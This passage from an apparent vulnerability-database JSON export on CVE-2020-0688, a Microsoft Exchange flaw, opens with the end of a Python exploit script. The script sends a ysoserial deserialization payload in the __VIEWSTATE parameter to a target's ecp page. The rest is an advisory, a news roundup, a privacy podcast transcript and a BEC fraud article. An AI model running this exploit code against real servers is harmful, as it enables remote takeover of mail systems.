[Y/n]: ')\r\n if ans.lower() == 'n': exit(0)\r\n sPayLoad = getYsoserialPayload(args.command, sSessionId)\r\n print('[+] Got Payload: ' + sPayLoad)\r\n sURL = sTarget + 'ecp/default.aspx?__VIEWSTATEGENERATOR=' + sViewState + '&__VIEWSTATE=' + urllib.quote_plus(sPayLoad)\r\n print(' Sending now ...')\r\n try: oOpener.open(urllib2.Request(sURL, headers={'User-Agent':'Python'}))\r\n except urllib2.HTTPError, e:\r\n if e.code == '500': print('[+] This probably worked (Error Code 500 received)')\r\n\r\nif __name__ == \"__main__\":\r\n\tmain()", "cvss": {"score": 9.0, "vector": "AV:N/AC:L/Au:S/C:C/I:C/A:C"}, "sourceHref": "https://www.exploit-db.com/download/48153"}], "mscve": [{"lastseen": "2020-08-07T11:48:32", "bulletinFamily": "microsoft", "cvelist": ["CVE-2020-0688"], "description": "A remote code execution vulnerability exists in Microsoft Exchange Server when the server fails to properly create unique keys at install time.\n\nKnowledge of the validation key allows an authenticated user with a mailbox to pass arbitrary objects to be deserialized by the web application, which runs as SYSTEM.\n\nThe security update addresses the vulnerability by correcting how Microsoft Exchange creates the keys during install.\n", "edition": 2, "modified": "2020-02-11T08:00:00", "id": "MS:CVE-2020-0688", "href": "https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-0688", "published": "2020-02-11T08:00:00", "title": "Microsoft Exchange Validation Key Remote Code Execution Vulnerability", "type": "mscve", "cvss": {"score": 9.0, "vector": "AV:N/AC:L/Au:S/C:C/I:C/A:C"}}], "trendmicroblog": [{"lastseen": "2020-04-10T15:48:34", "bulletinFamily": "blog", "cvelist": ["CVE-2020-0688"], "description": "\n\nWelcome to our weekly roundup, where we share what you need to know about the cybersecurity news and events that happened over the past few days. 
This week, learn about why Zoom has released an update for its Linux, Mac, and Windows apps that removes the meeting ID from the app's title bar. Also, read about Trend Micro\u2019s latest research on cloud-specific security, with examples of threats and risks that organizations could face when migrating to the cloud or using cloud services.\n\nRead on:\n\n[**Trend Micro Study Shows Cloud Misconfiguration as Major Threat**](<https://solutionsreview.com/security-information-event-management/trend-micro-study-shows-cloud-misconfiguration-as-major-threat/>)\n\n_This week, Trend Micro _[_released_](<https://www.trendmicro.com/vinfo/us/security/news/virtualization-and-cloud/exploring-common-threats-to-cloud-security>)_ new research findings concerning cloud security, a major area of concern for enterprises of all sizes. The research confirms the role of both human errors and complex deployments in creating cloud-based cyber threats; above all, Trend Micro notes the dangers of cloud misconfiguration to cloud environments. _\n\n[**NCSA Small Business Webinar Series**](<https://blog.trendmicro.com/ncsa-small-business-webinar-series/>)\n\n_The National Cyber Security Alliance is hosting a series of webinars for small business owners, and Trend Micro is proud to support this effort with guest speakers sharing threat intelligence and security expertise. The topics will help small companies deal with the challenges of COVID-19, including sessions on telework, digital spring cleaning, e-commerce security, how to avoid COVID-19 scams and more. _\n\n[**Cisco \u2018Critical Update\u2019 Phishing Attack Steals Webex Credentials**](<https://threatpost.com/cisco-critical-update-phishing-webex/154585/>)\n\n_An ongoing phishing campaign is reeling in victims with a recycled Cisco security advisory that warns of a critical vulnerability. The campaign urges victims to \u201cupdate,\u201d only to steal their credentials for Cisco\u2019s Webex web conferencing platform instead. 
The campaign is looking to leverage the wave of remote workers who have come to rely on online conferencing tools like Webex and other platforms._\n\n[**Principles of a Cloud Migration \u2013 From Step One to Done**](<https://blog.trendmicro.com/principles-of-a-cloud-migration-from-step-one-to-done/>)\n\n_Cloud migrations are happening every day and analysts predict over 75% of mid-size to large enterprises will migrate a workload to the cloud by 2021 \u2013 but how can you make sure your workload is successful? In this multi-part blog series, Trend Micro explores best practices, forward thinking, and use cases around creating a successful cloud migration from multiple perspectives. _\n\n[**Zoomed In: A Look into a Coinminer Bundled with Zoom Installer**](<https://blog.trendmicro.com/trendlabs-security-intelligence/zoomed-in-a-look-into-a-coinminer-bundled-with-zoom-installer/>)\n\n_Trend Micro recently found a Coinminer bundled with the legitimate installer of video conferencing app Zoom, luring users who want to install the software but end up downloading a malicious file. The compromised files are assumed to come from fraudulent websites. Trend Micro has been working with Zoom to ensure that they are able to communicate this to their users appropriately._\n\n[**Investigation into a Nefilim Attack Shows Signs of Lateral Movement, Possible Data Exfiltration**](<https://www.trendmicro.com/vinfo/us/security/news/cybercrime-and-digital-threats/investigation-into-a-nefilim-attack-shows-signs-of-lateral-movement-possible-data-exfiltration>)\n\n_Trend Micro\u2019s Managed XDR (MxDR) and Incident Response (IR) teams recently investigated an incident involving a company that was hit by the Nefilim ransomware, which was initially discovered in March 2020. 
What makes Nefilim especially devious is that the threat actors behind the attack threaten to release the victim\u2019s stolen data on an online leak site._\n\n[**Zoom Removes Meeting IDs from App Title Bar to Improve Privacy**](<https://www.zdnet.com/article/zoom-removes-meeting-ids-from-app-title-bar-to-improve-privacy/>)\n\n_Video conferencing service Zoom has released an update for its _[_Linux_](<https://support.zoom.us/hc/en-us/articles/205759689-New-Updates-for-Linux>)_, _[_Mac_](<https://support.zoom.us/hc/en-us/articles/201361963-New-Updates-for-macOS>)_, and _[_Windows_](<https://support.zoom.us/hc/en-us/articles/201361953-New-Updates-for-Windows>)_ apps that removes the meeting ID from the app's title bar.__ The update comes after the company's users have often leaked their meeting IDs, and even meeting passwords, when sharing screenshots of their meetings on social media._\n\n[**Analysis: Suspicious \u201cVery Hidden\u201d Formula on Excel 4.0 Macro Sheet**](<https://www.trendmicro.com/vinfo/us/security/news/cybercrime-and-digital-threats/analysis-suspicious-very-hidden-formula-on-excel-4-0-macro-sheet>)\n\n_A malicious Microsoft Excel 4.0 Macro sheet with a suspicious formula that is set as \u201cVery Hidden\u201d was submitted by a customer and further analyzed by Trend Micro researchers. The sheet is not readily accessible via the Microsoft Excel User Interface (UI) due to a feature documented in the Microsoft website that allows users to hide sheets. 
The compromised files were commonly used as an attachment in spam._\n\n[**Actively Exploited MS Exchange Flaw Present on 80% of Exposed Servers**](<https://www.helpnetsecurity.com/2020/04/08/exploit-cve-2020-0688/>)\n\n_Attackers looking to exploit CVE-2020-0688, a critical Microsoft Exchange flaw patched by Microsoft in February 2020, don\u2019t have to look hard to find a server they can attack: according to an internet-wide scan performed by Rapid7 researchers, there are at least 315,000 and possibly as many as 350,000 vulnerable on-premise Exchange servers (out of 433,464 total) out there._\n\n[**Misconfigured Docker Daemon API Ports Attacked for Kinsing Malware Campaign**](<https://www.trendmicro.com/vinfo/us/security/news/virtualization-and-cloud/misconfigured-docker-daemon-api-ports-attacked-for-kinsing-malware-campaign>)\n\n_A campaign that targets misconfigured Docker Daemon API ports through Kinsing malware was reported by security researchers from Aqua Security. The campaign exploited the ports to run an Ubuntu container. According to the researchers, Kinsing malware\u2019s strings revealed that it is a Golang-based Linux agent._\n\n[**Threat Actors Deliver Courier-Themed Spam Campaign with Attached ACE Files**](<https://www.trendmicro.com/vinfo/us/security/news/cybercrime-and-digital-threats/threat-actors-deliver-courier-themed-spam-campaign-with-attached-ace-files>)\n\n_Trend Micro researchers detected a new courier service-themed malicious spam campaign that uses ACE files as attachments. The samples were gathered from Trend Micro\u2019s honeypot. The email poses as a shipment arrival notification with a fake receipt attached. 
It then convinces receivers to download the attachment by asking them to check if the address on the receipt is correct._\n\n[**Exploring Common Threats to Cloud Security**](<https://www.trendmicro.com/vinfo/us/security/news/virtualization-and-cloud/exploring-common-threats-to-cloud-security>)\n\n_Trend Micro\u2019s recent cloud research provides examples of threats and risks organizations could face when migrating to the cloud or using cloud services. No matter the cloud service or platform, the common theme is that misconfiguration continues to be one of the major pitfalls of cloud security, affecting both companies who subscribe to cloud services and users of software that are hosted on the cloud._\n\n[**PowerPoint \u2018Weakness\u2019 Opens Door to Malicious Mouse-Over Attack**](<https://threatpost.com/powerpoint-weakness-mouse-over-attack/154589/>)\n\n_A researcher is sounding the alarm over what he believes could be a novel attack vector which allows a hacker to manipulate a PowerPoint file to download and begin the installation of malware, simply by hovering over a hypertext link. The technique does require a victim to accept one pop-up dialogue box to run or install a program. For those reasons, Microsoft does not consider this a vulnerability. _\n\n[**Cloud Transformation Is the Biggest Opportunity to Fix Security**](<https://blog.trendmicro.com/cloud-transformation-is-the-biggest-opportunity-to-fix-security/>)\n\n_Lower costs, improved efficiencies and faster time to market are some of the primary benefits of transitioning to the cloud. However, it\u2019s not done overnight. 
It can take years to move complete data centers and operational applications to the cloud and the benefits won\u2019t be fully realized until most functional data have been transitioned._\n\n[**Who is World Wired Labs and Why Are They Selling an Android Trojan?**](<https://www.cyberscoop.com/world-wired-labs-winnti-netwire-china-blackberry-cylance/>)\n\n_A company advertising a remote access tool frequently used by criminals and nation-state hackers may be serving as a front for a Chinese hacking group, according to research published by BlackBerry Cylance. In a report on remote access trojans (RAT), researchers detail an Android malware variant, which they call PWNDROID4, that can be used to monitor targets\u2019 phone calls, record audio, send and receive text messages, and track victims\u2019 GPS location._\n\nIs your organization looking to migrate to the cloud? Share your thoughts in the comments below or follow me on Twitter to continue the conversation: [@JonLClay.](<https://twitter.com/jonlclay>)\n\nThe post [This Week in Security News: Exploring Common Threats to Cloud Security and Zoom Removes Meeting IDs from App Title Bar to Improve Privacy](<https://blog.trendmicro.com/this-week-in-security-news-exploring-common-threats-to-cloud-security-and-zoom-removes-meeting-ids-from-app-title-bar-to-improve-privacy/>) appeared first on [](<https://blog.trendmicro.com>).", "modified": "2020-04-10T12:46:43", "published": "2020-04-10T12:46:43", "id": "TRENDMICROBLOG:9BC812C1F699A6136F37C0ACE6451F20", "href": "https://blog.trendmicro.com/this-week-in-security-news-exploring-common-threats-to-cloud-security-and-zoom-removes-meeting-ids-from-app-title-bar-to-improve-privacy/", "type": "trendmicroblog", "title": "This Week in Security News: Exploring Common Threats to Cloud Security and Zoom Removes Meeting IDs from App Title Bar to Improve Privacy", "cvss": {"score": 9.0, "vector": "AV:N/AC:L/Au:S/C:C/I:C/A:C"}}], "threatpost": [{"lastseen": "2020-04-08T11:52:11", 
"bulletinFamily": "info", "cvelist": ["CVE-2020-0688"], "description": "Data privacy has been an outstanding theme this past week, and the Threatpost team discussed the biggest privacy related news. In the news wrap podcast for April 26, the team discussed the backstories behind several reports from the week, including:\n\n * Facebook potentially [facing Federal Trade Commission (FTC) fines](<https://threatpost.com/facebook-5-billion-ftc-fine/144104/>) as high as $5 billion for its data-security practices\n * A report that employees at Amazon can [access geolocation information](<https://threatpost.com/amazon-employees-personal-alexa/144119/>) for Alexa users\n * Questions around data security and consent around [facial recognition](<https://threatpost.com/facial-recognition-consent-doesnt-exist-threatpost-poll-finds/144126/>) after the EU\u2019s approval of a massive biometrics database\n * The exposure of [2 million passwords](<https://threatpost.com/leaky_app_data/144029/>) for Wi-Fi hotspots online by an insecure database\n\n_Below is a lightly edited transcript of the podcast._\n\n**Lindsey O\u2019Donnell**: Welcome to the Threatpost podcast, and the Threatpost team is all here this Friday morning. You\u2019ve got Lindsey O\u2019Donnell and I\u2019m here with Tara Seals and Tom Spring. Hey, everyone.\n\n**Tara Seals:** Hey, Lindsey.\n\n**Tom Spring:** How\u2019s it going, Lindsey? How\u2019s it going, Tara?\n\n**Lindsey**: Good. So, privacy has really been kind of the name of the game this week, in terms of all the stories that we\u2019ve written. 
And I know, we had a lot of data privacy type stories, everything from Amazon Echo privacy issues to facial recognition. But if we\u2019re talking about data privacy, I think we should really start by bringing Facebook into the conversation here, as we usually do.\n\n**Tara: **Yeah, that seems to have been a top theme of the week for sure. And you did a ton of reporting on that this week.\n\n**Lindsey: **Yeah, so, the big news this week was that Facebook may be facing fines of between $3 to $5 billion for that FTC fine that was related to the Cambridge Analytica incident last year, and all of their data privacy issues that they\u2019ve had since then. So, Facebook had its earnings and disclosed this amount of money that is set aside as contingency expenses. And I feel like we keep hearing about reports of Facebook, having all these data sharing incidents, or having all these crazy data practices, but now we\u2019re really looking at the consequences. And everyone\u2019s wondering how data collection and sharing will be regulated and what kind of fines we\u2019ll see. So that should be interesting to keep an eye on how this actually plays out in the coming months.\n\n**Tara: **Yeah, and I wonder in terms of all of that, when we talk about the GDPR, over in Europe, and how it has really stringent requirements for explicit consent before somebody harvests your data, which obviously is not something that Facebook adheres to, for U.S. citizens anyway \u2013 have there been any rumblings out there in terms of whether or not Facebook might face future regulation?\n\n**Lindsey: **I think that\u2019s there\u2019s been a lot of discussion about it. I know, obviously, Mark Zuckerberg has appeared in front of Congress. And it\u2019s definitely been at the forefront of discussion. But beyond some state-level data privacy practice regulations, it\u2019s something that people are still trying to figure out. 
So I think that\u2019s kind of why this FTC fine is at the center of attention. There was news today, actually, that the _New York Times _was talking to sources who said that the FTC is discussing stronger monitoring of Facebook\u2019s privacy policies, as well as direct punishment of Mark Zuckerberg. So that raises questions about how to deal with data sharing, whether it\u2019s kind of hitting at the CEO, or even just imposing bigger fines. But Tara, I know, you listen to the actual earnings call. Were there any special call outs about the fine or data security in general? I\u2019m curious if they talked about it at all.\n\n**Tara:**They studiously avoided talking about the fines specifically, which, it\u2019s a charge off of, they added $3 billion, and they said it could go up to as much as $5 billion, and so that ate into their profit, which is kind of interesting, because they reported, I think it was, I don\u2019t have it in front of me, but I think it was around like $2.3 billion in profit for the quarter.\n\nAnd that that is taking into account that $3 billion contingency fine. And they didn\u2019t really specifically discuss it. But they did say that they expected profits to continue to waver a little bit going forward, due to regulatory headwinds, as well as advertising-related falloff, because they\u2019re not sure that they can make the same amount of revenue off of ad targeting that they have in the past.\n\nSo that sort of in a roundabout way speaks to the fact that they\u2019re looking into making some changes in terms of how they collect and use user data. But that\u2019s sort of reading between the lines, and they certainly didn\u2019t say anything explicit about it, unfortunately.\n\n**Lindsey: **Right. Well, I know one big point of discussion was, is this enough? How does this compare to past fines? Because I know Facebook has faced various fines in the past, which Tara you have actually written about. 
I think it was in December it was fined like $11 million. And then in October, it was fined $645,000. So obviously, those kind of shy away in comparison to $5 billion, but I think people are still kind of asking, how does this compare? Facebook\u2019s kind of overall \u2013\n\n**Tara: **Yeah, their overall profit, annual, you know, $3 to 5 billion is significant for them, actually.\n\n**Tom:**Well, I just looked it up. Facebook made more than $40 billion in revenue in 2017.\n\n**Tara: **What\u2019s the profit? That\u2019s the real marker right?\n\n**Tom: **Well, it is the real marker.\n\n**Lindsey: ** I\u2019m curious what will come out of it. But I do know that everyone\u2019s really looking at this as some sort of precedent for how Facebook will be regulated in the future, if it continues with the data security issues that have been happening over the past year, since Cambridge Analytica.\n\n**Tara: **One of the things too, Lindsey, that I wanted to ask you about was, you know, [the poll that we did](<https://threatpost.com/three-fourths-of-consumers-dont-trust-facebook-threatpost-poll-finds/143963/>) on attitudes towards Facebook. But, you know, also in the wake of their earnings that showed that they had seen an 8 percent year over year, subscriber jump, so the headlines, even though people are sort of horrified by them, they\u2019re not really dissuading people from actually using the platform, which I think is interesting. And then also their stock price just skyrocketed, after they reported their earnings, even with the charge off for the fine. So I don\u2019t know, I don\u2019t know what\u2019s going to happen in the future and whether any of this is going to make a difference in terms of whether or not it\u2019s successful as a company.\n\n**Tom: **I was just thinking, I think that, it\u2019d be interesting to watch the regulatory space to see what the U.S. 
does, especially with GDPR, in terms of what\u2019s going on in Europe, and really a constant sort of, you know, march of bad news in terms of privacy, and also with breaches that are taking place, not only with Facebook, but with a ton of other companies \u2013 I think what we\u2019re doing is we\u2019re setting up in 2020, and beyond some new rules around privacy and some new regulations around privacy. Because I mean, as you just pointed out, Tara, fines and threats and punishments are not really impacting the way Facebook\u2019s doing business or hurting them in terms of their business model.\n\n**Lindsey:** Right. I don\u2019t think at all that people are going to stop using Facebook. And I mean, to be totally honest, even if they do adopt some sort of model where you pay to use the platform without advertising or without your data being collected and shared \u2013 I\u2019m not sure how many people would even opt in for that as well. I mean, I could be completely wrong. But I don\u2019t know if people are going to pay an extra like $5 a month or something to use a social media platform that\u2019s already free.\n\n**Tom:** Yeah, I don\u2019t think anybody\u2019s going to be paying. But I think what you\u2019ll see is probably some government intervention. That\u2019s my prediction. I mean, the things that we regulate here in the U.S. \u2013 these companies, whether it be Amazon, Google, or Facebook, they\u2019ve basically had a clear runway to do whatever they wanted for I don\u2019t know how many years. And, you know, if you think about all the different things that we regulate in this country, privacy really isn\u2019t one of them right now, but certainly is a right target for legislators to focus on.\n\n**Lindsey:** Right. That\u2019s the good point. Speaking of Amazon, I know, Tara, you covered a really interesting story this week too about news of their auditing program for Echo devices, which had already been reported. 
But now I guess a new report said that they\u2019re also exposing geolocation data, in addition to voice data. Can you add some color there?\n\n**Tara: **Sure. So, this story was really interesting to me. And it\u2019s not just Echo either. It\u2019s also, you know, the other Alexa devices including the Fire TV devices and there are tons of third-party gadgets that have Alexa built in now. So this is kind of a broad reaching story, from an Internet of Things perspective. But yeah, so apparently, and as you pointed out, this is something that _Bloomberg _had broken a story on about three weeks ago, talking about the fact that Amazon has a team of people in place that may manually audit Alexa interactions to make sure that the AI is learning appropriately. And it\u2019s been effective and accurate and returning good results for users, and all that kind of thing. But what\u2019s interesting is in the process of that, this data, which is supposed to be anonymous, right? So it\u2019s just sort of random snippets \u2013 human people will listen to this, and then see what Alexa\u2019s response was matched up, make sure that it\u2019s accurate, do whatever secret sauce they have to do with the algorithm and the AI to fix it, or to make her smarter \u2013 But in the process of this, apparently, geolocation data gets scooped up here. Because when people ask, Alexa, tell me what the weather forecast is, or Alexa, I\u2019m feeling like Chinese, is anybody delivering to my house, that type of thing. That necessarily, obviously, those local results have to be tied to geolocation data. So they\u2019re scooping up and harvesting and storing and logging GPS coordinates, in addition to sort of these random, other snippets. And so there were five different employees within Amazon that are working on this program, that basically came forward and said that they feel that nobody gave their consent for this and that it\u2019s too broad of an access for them to have. 
And then they actually on a whim, sort of plugged these coordinates into Google Maps and found that they could actually track somebody\u2019s place of business or their house, and even bring up a picture of that house. And through other means, actually identify who lives there, and then tie all this other information together and be able to create a very creative profile.\n\n**Tom: **I agree with you, Tara, I think that we need to be more concerned about the privacy that we hand over to these types of digital devices. And I\u2019m even more concerned now about the privacy issues that have surround geo-specific apps, where you\u2019re using an app and it understands where you\u2019re at and gives you sort of context-relevant information, and how that data is being used, and who\u2019s using it, and who\u2019s collecting it. When you think about Amazon, they\u2019re a much more potentially powerful company considering all the tentacles that it has into my buying and my data, and my home with their Alexa speakers.\n\n**Lindsey:**Yeah, that\u2019s a really good point. And I\u2019m curious too about the consent and notification side of all of this. I mean, did they have any response Tara about if they gave any notification that they were doing any of this at all? Is there anything on Amazon\u2019s website about this program?\n\n**Tara: **No, no, this was completely in the background until _Bloomberg _came forward with their report, they didn\u2019t acknowledge that it exists. And they just put out a statement saying, you know, we take privacy seriously. And saying, we limit, the number of people that have access to this, who are tasked with doing this as part of their job, and they\u2019re bound by, you know, all kinds of restrictions and things like that it\u2019s highly controlled.\n\n**Tom: **I gotta come back to the point where I feel like this is an area ripe for regulation. 
I\u2019m not pro regulation but I mean, if this is something that consumers are outraged about \u2013 I think there\u2019s got to be a GDPR type regulations that we\u2019re going to see here in the U.S. that that are going to impact the Facebook\u2019s and the Amazons in the world.\n\n**Tara:** Right and now, we have other types of privacy and sort of potentially intrusive privacy issues to worry about too \u2013 Lindsey, going back to some of the reporting you did this week, but with the facial recognition stuff is happening. You know that that seems like sort of the Wild West out there. There\u2019s no regulation around that. Right?\n\n**Lindsey:** Well, yeah, exactly. And the scary thing about that, too, is that a lot of the facial recognition applications out there are actually being used by the government. So by the Department of Homeland Security and by policemen and whatnot. But yeah, facial recognition came up in the headlines a bunch this week, because there\u2019s been two different incidents. The first was you guys may have heard the EU last week approved a massive biometrics database that would combine the data from law enforcement, from Border Patrol, and more for both EU and non US citizens. So there was that. And then there was another incident this week that occurred where a JetBlue passenger was boarding a flight. And she noticed that instead of scanning her boarding pass, or taking a look at her passport, she was directed to look into a camera, before being allowed onto the jet bridge. So she was confused about what was going on and so tweeted at JetBlue. And it turns out, this was part of a Customs and Border Patrol program that\u2019s used in I think, 17 airports, where it uses facial recognition to identify passengers and let them through the gateway onto the plane. 
So her tweet went viral and kind of started this massive conversation about facial recognition and you know, if you can consent and where the data is coming from, how it\u2019s being shared. So that\u2019s been a really interesting story to cover, and kind of see the backlash and reaction to both of these incidents.\n\n**Tom: **I can relate to that. I recently traveled to Mexico, for a little vacation. And, I am seeing facial recognition more and more in my life. I think the interesting thing about your story, Lindsey, was also you wrote about consent, whether or not all of these facial recognition systems actually ask for consent and get consent, which they don\u2019t. But when I went to Mexico, we flew into Mexico, and then we went through customs in Mexico, and Mexico had immigration kiosks, where they asked for facial recognition and fingerprints, and to scan our passports, which \u2013 I was really creeped out. My son, who\u2019s 14 years old, I think probably is now part of the government database of fingerprints and facial recognition. It was kind of weird. Considering, you know, he\u2019d been off grid, perhaps I think for a while now, he\u2019s part of the system. And then we flew back into the United States. There was these huge immigration lines in the Boston Airport. And one of the things that we were able to do was to cut the line by using what was called a mobile passport app. And I didn\u2019t realize it but when you use the app, and you get to skip this, this huge onerous line that goes to basically more facial recognition kiosks for people coming into the United States. And the app itself was pretty slick. I mean, it\u2019s kind of funny, because I felt really good about using the app, because it allowed me to cut in line. But the app basically did a facial recognition, had me input my passport information, and basically, took my identity in this app. 
And, I was so eager to cut the line, I gotta admit, I kind of skipped over a lot of the terms of services. And it saved me about 45 minutes. And for the price of handing over my biometric data to the government and to this to this app.\n\n**Lindsey: **That experience brings up a really good point, because, I think that there definitely are benefits to facial recognition. Like, it\u2019s not all about this dire Orwellian society. I think it makes these processes so much more efficient. But I do think there\u2019s also a bunch of kind of privacy concerns that people expressed to me over the past week. And, Tom, like you were saying, consent and notification, but then also in terms of how the data is being secured, how it\u2019s being shared, and who\u2019s gaining access to that data. So I think that there\u2019s kind of a lot that goes into it. I know that we actually did a poll, a Threatpost poll, and half of the respondents, this kind of surprised me, but half of the respondents said that they don\u2019t believe consent is realistically possible when it comes to facial recognition. So I thought that was interesting, too, because if you think about some of the use cases where biometrics and facial recognition exists, if you have like a security camera, or surveillance camera that is using facial recognition, there\u2019s not a lot you can do to opt out of that except for avoiding that area.\n\n**Tom:**Well, I think you mentioned that the White House now has a zone where they use facial recognition. And right there, there\u2019s no way you can say no, you walk into that zone. And you\u2019re basically get put into a big database, and they cross reference it and figure out who you are.\n\n**Lindsey: **Right. So there\u2019s a lot that goes into that. And then when I was talking to a bunch of security people at the Electronic Frontier Foundation, as well, they were mentioning that there really needs to be regulation for all this. 
And there, there is one law that exists in Illinois, where it basically regulates the collection of biometric data without consent. But they think that there needs to be more. And in particular, regulation that impacts law enforcement, as opposed to just businesses which that law did. So I know, there\u2019s also been a new bill that was introduced in March, it was, what was it called, the Commercial Facial Recognition Privacy Act, that would have like more widespread implications for businesses in terms of how what kind of notification and consent they would need when they use facial recognition. So I think that\u2019s kind of a step in the right direction, but something to be looking out for.\n\n**Tom: **Yeah, facial recognition has been a creepy topic for a long time. But you know, as these GPUs get better, and these computers get better, and the efficiency of the compute behind them get better. It just becomes even creepier. I don\u2019t even think the tin foil hats will help protect you.\n\n**Lindsey: **So Tom, you also had an interesting story this week. I think it was about passwords being \u2013 I think it was 2 million passwords were \u2013 being exposed.\n\n**Tom: **Yeah. So I mean, we hear about these breach stories all the time. And I mean, there\u2019s probably like, since we\u2019ve been talking, there\u2019s probably been like three breaches, or should I say leaky servers and insecure data on the internet. And one of the things that I think is kind of interesting about the story is that the leaky data, it was tied to a China-based app manufacturer, called Wi Fi Finder. And researchers at GDI Foundation, found 2 million hotspots and passwords for those hotspots on the servers of this app, this Android app called WiFi Finder. And essentially, it\u2019s pretty straightforward. The app itself is an Android-based app, you can get it on Google Play. And it\u2019s one of many of apps that do the same thing. 
And that is essentially crowdsource on Wi-Fi hotspot data, and also pairing that information with passwords. So the idea is if your dataset is big enough, and you\u2019re wandering around with this app on your phone, you can find a hotspot, and you can authenticate to that hotspot, and you don\u2019t have to ask anybody for a Wi-Fi password. Now, the data that was found on the servers was pretty extensive in the sense that it wasn\u2019t just commercial businesses. So you know, you go to Starbucks, you go to your local gym, or you go to, you know, a bookstore or something like that, you know, you have these public Wi Fi hotspots with a password that you may have to ask for, you may have to look for. And what was happening was that people were crowdsourcing private companies that were not, generally publicly accessible. And for some odd reason, and this really wasn\u2019t explained very well in the reporting, of the research, was that there was a massive, massive amount of Wi-Fi hotspots that were owned by home users like consumers. And so you would you basically had a lot of a lot of password information and a lot of hotspots by consumers in their homes. And the concern there is, is that in a commercial setting, or even in a sort of a public business, publicly accessible hotspot, there are protections put in place to prevent people from messing with the router configurations and accessing some of the some of the settings within the router. But as if you have access to a home router, those security measures are not in place. And there was no documented cases of hacking, but the concern was there regarding that type of information being available to anybody that had access to this leaky server.\n\n**Lindsey:**I feel like we keep seeing this issue of insecure databases and these accidental exposures, which, obviously are different from a malicious breach. I\u2019m curious if there\u2019s something that can be done to prevent this for people who own these databases. 
I mean, Tom, did you talk to anyone, any experts who had any recommendations about how to better secure databases and kind of what the underlying problem is here?\n\n**Tom:** I did talk to a couple experts on this one. And, you know, the advice is always the same. In terms of leaky data on servers, it doesn\u2019t change much. Just make sure you configure your servers correctly, and make sure that they\u2019re not accessible to the public. I mean, there\u2019s a couple strategies that you can apply to that. I think one of the other suggestions was the way in which some of these publicly accessible sites providing and offer Wi-Fi, and that would be more or less not an open Wi-Fi, not an insecure Wi-Fi, but things that use tokens and allow and divvy out Wi-Fi to individuals using a specific time delineated username and a unique password. And that way, it would basically render all of these apps useless, because there would be a unique username and a unique password, that would timeout within a certain period of time, which would really create a much more secure public Wi-Fi experience. And that was really the suggestion. And that was really what the experts were saying that I talked to regarding the blowback on this story.\n\n**Lindsey:** Well, I\u2019m feeling sufficiently like I need more privacy right now. Maybe we should wrap up now, Tom and Tara, thanks for taking the time and really interesting discussion today.\n\n**Tara:** Yeah. Thanks, Lindsay. Thanks, Tom.\n\n**Tom:** Yeah, have a great weekend. 
Have a great weekend.\n\n**Lindsey: **Catch us next week on the Threatpost podcast.\n\nFor direct download, [click here](<http://traffic.libsyn.com/digitalunderground/NEWS_WRAP_FINAL.mp3>).\n", "modified": "2019-04-26T17:57:36", "published": "2019-04-26T17:57:36", "id": "THREATPOST:FE41B3825C6A9EE91B00CDADD2AF9147", "href": "https://threatpost.com/threatpost-news-wrap-podcast-for-apr-26/144144/", "type": "threatpost", "title": "News Wrap: Amazon Echo Privacy, Facebook FTC Fines and Biometrics Regulation", "cvss": {"score": 9.0, "vector": "AV:N/AC:L/Au:S/C:C/I:C/A:C"}}, {"lastseen": "2020-04-08T11:57:09", "bulletinFamily": "info", "cvelist": ["CVE-2020-0688"], "description": "A church in Brunswick, Ohio was scammed out of a whopping $1.75 million as a result of a business email compromise (BEC) attack.\n\nSt. Ambrose Catholic Parish, which has around 16,000 members, has been working on a massive $4 million church renovation, dubbed \u201cVision 20/20\u201d \u2013 but attackers figured out a way to hack into the church\u2019s email system, take control of two church employee accounts, and eventually divert payments related to the project to a fraudulent account owned by them.\n\nAccording to [local reports](<https://www.cleveland.com/crime/2019/04/email-hackers-steal-175-million-from-st-ambrose-catholic-parish-in-brunswick.html>), the church said in a letter to parishioners over the weekend that it was notified of the issue on April 17, after the construction company behind the renovations contacted the church saying it had missed payments on the project.\n\n\u201cOn Wednesday, Marous Brothers called inquiring as to why we had not paid our monthly payment on the project for the past two months, totaling approximately $1,750,000,\u201d according to an email sent by the church to parishioners. 
\u201cThis was shocking news to us, as we have been very prompt on our payments every month and have received all the appropriate confirmations from the bank that the wire transfers of money to Marous were executed/confirmed.\u201d\n\nAfter involving the Brunswick police and the FBI, the church discovered that their email system was hacked and that bad actors had taken control of two employee email accounts.\n\nUsing these two hacked accounts, the attackers were able to pretend they were the email accounts\u2019 real owners, and deceived other employees into believing Marous Brothers had changed their bank and wiring instructions. The $1.75 million in church payments for two months were then sent to a fraudulent bank account owned by the cybercriminals.\n\n\u201cThe money was then swept out by the perpetrators before anyone knew what had happened,\u201d according to the church. \u201cNeedless to say, this was very distressing information.\u201d\n\nThe church said it is currently working with the FBI and its insurance company to try to recover the stolen funds. Meanwhile, it said, no other data \u2013 such as databases with parishioner information or church financial information \u2013 has been compromised.\n\nBEC scams continue to plague companies as attackers become more advanced \u2013 particularly as infamous BEC groups like [London Blue](<https://threatpost.com/bec-scam-gang-london-blue-evolves-tactics-targets/143440/>), [Scarlet Widow](<https://threatpost.com/rsac-2019-bec-scammer-gang-takes-aim-at-boy-scouts-other-nonprofts/142302/>) and others continue honing their techniques.\n\n[](<https://media.threatpost.com/wp-content/uploads/sites/103/2019/04/30112714/FBI-IC3-11.png>)\n\n[According to](<https://threatpost.com/fbi-bec-scam-losses-double/144038/>) the FBI\u2019s annual Internet Crime Report (IC3) for 2018, BEC scams ultimately drained victims of over $1.2 billion last year. 
For contrast, in 2017, BEC attacks resulted in adjusted losses of $675 million.\n\nSt. Ambrose Catholic Parish isn\u2019t the first high-profile community case, either. The FBI in its report said it received a complaint from a town in New Jersey that fell victim to a BEC scam \u2014 and transferred over $1 million to a fraudulent account (the FBI was able to freeze the funds and return the money to the town). Individuals suffer too: In another case, a BEC victim received an email purporting to be from their closing agent during a real-estate transaction \u2014 resulting in the person initiating a wire transfer of $50,000 to a fraudster\u2019s bank account located in New York.\n\nRonnie Tokazowski, senior threat researcher at Agari, told Threatpost in a recent interview there are several steps that firms \u2013 and individuals \u2013 can take to protect against BEC scams.\n\n\u201cFor BEC protections, there are several things that organizations and individuals can do to not fall victim,\u201d he said. \u201cFirstly, implementing a DMARC [which stands for Domain-based Message Authentication, Reporting and Conformance and is an email authentication protocol] solution can help organizations look at the reputation of senders who may be spoofing their CEO\u2019s, asking for wire transfers or gift card. For individuals, being informed about the different types of scams that actors are using can be helpful as well.\u201d\n", "modified": "2019-04-30T16:21:59", "published": "2019-04-30T16:21:59", "id": "THREATPOST:2BDC072802830F0CC831DE4C4F1FA580", "href": 